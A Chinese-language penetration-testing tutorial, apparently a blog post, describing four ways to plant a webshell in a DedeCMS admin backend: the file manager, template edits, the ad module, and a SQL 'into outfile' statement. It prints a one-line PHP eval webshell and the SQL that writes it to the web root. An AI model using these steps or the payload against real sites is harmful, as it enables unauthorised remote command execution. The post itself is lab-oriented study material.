常见CMS漏洞之二:DeDeCMS

DedeCMS是织梦团队开发PHP ⽹站管理系统,它以简单、易⽤、⾼效为特⾊,组建出各种各样各具特⾊的⽹站,如地⽅⻔户、⾏业⻔户、政府及企事业站点等。

姿势⼀:通过⽂件管理器上传WebShell

1.访问⽬标靶场其思路为 dedecms 后台可以直接上传任意⽂件,可以通过⽂件管理器上传 php⽂件获取webshell...登陆到后台点击 【核⼼】 --》 【⽂件式管理器】 --》 【⽂件上传】 将准备好的⼀句话代码上传...OK

2.访问上传的文件

姿势⼆:修改模板⽂件拿WebShell

1.与WPCMS类似,直接修改模板拿WebShell..点击 【模板】 --》 【默认模板管理】 --》【index.htm】 --> 【修改】 在⽂件修改中添加⼀句话代码....如下

2.点击 【⽣成】 --》 【更新主⻚HTML】 --》将主⻚位置修改为 【../index.php 】--》 点击 【⽣成静态】 --》点击 【更新主⻚】 再次访问站点⾸⻚可发现变化..

3.访问主⻚,phpinfo更新成功

姿势三:后台任意命令执⾏拿WebShell

1.点击 【模块】 --》 【⼴告管理】 --》 【增加⼀个新⼴告】 --》在 【⼴告内容】 处添 加⼀句话代码--》点击 【确定】

2.点击【代码】--》在图中显示的路径与站点进⾏拼接....访问测试!

3.使⽤菜⼑连接测试...

姿势四:通过后台sql命令执⾏拿webshell

1.访问系统---sql命令⾏⼯具---执⾏ select @@ basedir,获取mysql路径,由此瑞测⽹站绝对路径

2.into outfile写⼊⼀句话⽊⻢

select '<?php @eval($_POSTcmd);?>' into outfile 'L:/phpstudy_pro/WWW/webshell.php'

3.访问webshell.php 并测试执⾏系统命令

相关推荐
四月天4311 小时前
web安全-SSTI(服务器模板注入)
笔记·学习·web安全·网络安全
菩提小狗14 小时前
每日安全情报报告 · 2026-07-04
网络安全·漏洞·cve·安全情报·每日安全
独守一片天15 小时前
HarmonyOS 6.1.0 Call Service 来电识别与安全通信怎么设计?
安全·华为·harmonyos
想你依然心痛17 小时前
嵌入式C代码规范:MISRA-C 2012核心规则解读——类型安全与未定义行为深度剖析
c语言·安全·代码规范
Elastic 中国社区官方博客17 小时前
跟踪资金流向:使用 ES|QL 和跨集群搜索追踪洗钱网络
大数据·人工智能·安全·elasticsearch·搜索引擎·金融·全文检索
IT新视界18 小时前
数据要素安全流通服务
安全
微信开发api-视频号协议20 小时前
Codex++安全边界探秘:从模型能力到风险防御
前端·安全·微信·企业微信
枝头玉20 小时前
新160个CrackMe048-monkeycrackme1、049-THraw-crackme8、050-daxxor逆向分析
安全·逆向·crackme·reserve
维基框架20 小时前
Claude Mythos Preview 发布后严重漏洞激增:安全还是营销?
人工智能·安全
技术不好的崎鸣同学20 小时前
[MRCTF2020]PYWebsite 思路及解法
安全·web安全